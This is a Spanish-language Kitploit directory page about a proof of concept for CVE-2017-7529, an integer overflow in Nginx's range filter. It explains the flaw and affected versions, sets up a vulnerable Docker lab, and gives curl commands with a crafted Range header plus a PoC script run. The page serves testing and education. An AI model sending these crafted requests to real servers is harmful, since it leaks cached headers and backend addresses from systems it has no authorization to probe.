Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2017-7529 | Kitploit
Herramientas/GitHubGitHub/liusec/cve-2017-7529
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de PenetraciónAprendizaje y Educación
GitHubliusec/cve-2017-7529

CVE-2017-7529

Ver Repositorio
168hace 9 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Vulnerabilidad de desbordamiento de enteros en Nginx CVE-2017-7529

Información de la vulnerabilidad

Cuando se utilizan los módulos estándar de nginx, un atacante puede obtener la información del encabezado de los archivos en caché de la respuesta enviando solicitudes de cabecera (header) que contienen un campo range maliciosamente construido. En ciertas configuraciones, el encabezado del archivo en caché puede contener la dirección IP del servidor backend u otra información sensible, lo que provoca una fuga de información.

Referencia: 【Análisis de vulnerabilidad】Análisis de alerta de la vulnerabilidad de desbordamiento de enteros en el filtro range de Nginx (CVE–2017–7529)

Impacto de la vulnerabilidad

Esta vulnerabilidad afecta a todas las versiones 0.5.6 - 1.13.2 de Nginx con módulos de configuración predeterminada. Solo es necesario tener habilitada la caché para que un atacante pueda enviar solicitudes maliciosas y realizar ataques remotos que provoquen una fuga de información.

Cuando el servidor Nginx utiliza caché de proxy, un atacante que explote esta vulnerabilidad puede obtener la IP real del backend del servidor u otra información sensible.

Nuestro análisis determina que esta vulnerabilidad tiene una dificultad de explotación baja; puede clasificarse como una vulnerabilidad de tipo low-hanging-fruit y tiene cierto valor de explotación en ataques de red reales.

Versiones afectadas

Nginx versión 0.5.6 - 1.13.2

Versiones corregidas

Nginx versión 1.13.3, 1.12.1

Obtener el entorno:

  1. Descargar la imagen al equipo local
root@kitploit:~
$ docker pull medicean/vulapps:n_nginx_1
  1. Iniciar el entorno
root@kitploit:~
$ docker run -d -p 8000:80 medicean/vulapps:n_nginx_1

El 8000 que aparece delante de -p 8000:80 representa el puerto de la máquina física; se puede especificar libremente.

Uso y explotación

POC

  1. Acceda al archivo en caché para obtener el Content-Length, tomando /proxy/demo.png como ejemplo:
root@kitploit:~
$ curl -I http://127.0.0.1:8000/proxy/demo.png

HTTP/1.1 200 OK
Server: nginx/1.13.1
Date: Wed, 12 Jul 2017 15:57:57 GMT
Content-Type: image/png
Content-Length: 16585
Connection: keep-alive
Last-Modified: Wed, 12 Jul 2017 15:57:57 GMT
ETag: W/"40c9-5543e4fad0d40"
X-Proxy-Cache:: MISS
Accept-Ranges: bytes

Una vez visto Content-Length: 16585, busque un valor mayor que este número, por ejemplo 17208; el segundo valor de range es 0x8000000000000000-17208, es decir, 9223372036854758600.

  1. Al realizar la solicitud, establezca el range de la siguiente manera:
root@kitploit:~
$ curl -i http://127.0.0.1:8000/proxy/demo.png -r -17208,-9223372036854758600

Vea el resultado:

Script PoC

root@kitploit:~
$ python poc.py http://127.0.0.1:8000/proxy/demo.png

Vulnerable: http://127.0.0.1:8000/proxy/demo.png

Enlaces de referencia

  • 【Análisis de vulnerabilidad】Análisis de alerta de la vulnerabilidad de desbordamiento de enteros en el filtro range de Nginx (CVE–2017–7529)
  • Análisis de la vulnerabilidad de desbordamiento de enteros en Nginx CVE-2017-7529
Descargar herramienta